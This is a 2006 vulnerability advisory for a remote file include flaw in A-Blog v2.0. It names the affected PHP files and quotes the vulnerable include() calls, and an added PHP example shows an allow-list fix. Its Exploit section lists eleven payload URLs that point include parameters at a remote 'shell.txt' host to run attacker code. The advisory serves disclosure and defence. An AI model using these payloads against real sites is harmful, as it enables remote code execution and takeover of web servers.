A-Blog v2.0 Remote File Include

2006-09-28T00:00:00
ID SECURITYVULNS:DOC:14470
Type securityvulns
Reporter Securityvulns
Modified 2006-09-28T00:00:00

Description

==============================================================================================

A-Blog v2.0 Remote File Include

===============================================================================================

Critical Level : Dangerous

A-Blog

http://prdownloads.sourceforge.net/a-blog/A-BlogV2.rar?download

Version : v2.0

================================================================================================

Bug in :

/navigation/links.php

/navigation/search.php

/navigation/donation.php

/navigation/latestnews.php

/sources/myaccount.php

================================================================================================

Vulnerable Code :

include("$navigation_start")

include("$navigation_middle")

include("$navigation_end")

include("$open_box")

include("$middle_box")

include("$close_box")
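Added example, not code from A-Blog or the advisory author: the include pattern quoted above next to a hardened replacement that keeps request data out of include() entirely. The template directory and file names are hypothetical.

```php
<?php
// Added example, not from A-Blog. The advisory quotes fragments such as
// include("$open_box"). With register_globals=On, $open_box is filled straight
// from ?open_box=..., and with allow_url_fopen/allow_url_include enabled PHP
// fetches that URL and executes it as code: a remote file include.
//
// Vulnerable shape, for comparison only (do not use):
//   include("$open_box");
//
// Hardened replacement: user input never reaches include(). The request
// supplies a short key, read explicitly from $_GET, that is looked up in a
// fixed allow-list of template files; anything else is rejected.
// The template directory and file names below are hypothetical.

const BOX_TEMPLATES = array(
    'default' => 'open_box.php',
    'compact' => 'open_box_compact.php',
);

/**
 * Return the absolute path of the template for $key, or null if $key is not
 * in the allow-list. No part of $key is ever used to build the path.
 */
function resolve_box_template(string $key, array $allowed = BOX_TEMPLATES): ?string
{
    if (!array_key_exists($key, $allowed)) {
        return null;
    }
    return __DIR__ . '/templates/' . $allowed[$key];
}

// Defence in depth: these php.ini settings remove the whole bug class. They
// cannot be changed at runtime, so the code checks them rather than sets them.
if (ini_get('allow_url_include')) {
    error_log('allow_url_include is On; set it Off in php.ini');
}

$key = isset($_GET['open_box']) ? (string) $_GET['open_box'] : 'default';
$template = resolve_box_template($key);
if ($template === null) {
    http_response_code(400);
    exit('unknown template');
}
include $template;
```

With register_globals=Off (the default since PHP 4.2 and removed in 5.4) the variables named in the advisory are no longer populated from the query string, which on its own closes the vectors listed below.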

================================================================================================

Exploit :

http://localhost/A-Blog/sources/myaccount.php?open_box=http://shell.txt?

http://localhost/A-Blog/sources/myaccount.php?middle_box=http://shell.txt?

http://localhost/A-Blog/sources/myaccount.php?close_box=http://shell.txt?

http://localhost/A-Blog/navigation/search.php?navigation_end=http://shell.txt?

http://localhost/A-Blog/navigation/donation.php?navigation_start=http://shell.txt?

http://localhost/A-Blog/navigation/donation.php?navigation_middle=http://shell.txt?

http://localhost/A-Blog/navigation/donation.php?navigation_end=http://shell.txt?

http://localhost/A-Blog/navigation/latestnews.php?navigation_start=http://shell.txt?

http://localhost/A-Blog/navigation/latestnews.php?navigation_middle=http://shell.txt?

http://localhost/A-Blog/navigation/links.php?navigation_start=http://shell.txt?

http://localhost/A-Blog/navigation/links.php?navigation_middle=http://shell.txt?

================================================================================================

Discovered By : v1per-haCker

Contact : v1per-hacker[at]hotmail.com

XP10_hackEr Team

Greetz to : abu_shahad ; RooT-shilL ; hetler_jeddah ; BooB11 ; FaTaL ; ThE-WoLf-KsA ; mohandko ; fooooz ; maVen

and all members in XP10_hackEr Team

WWW.XP10.COM

==================================================================================================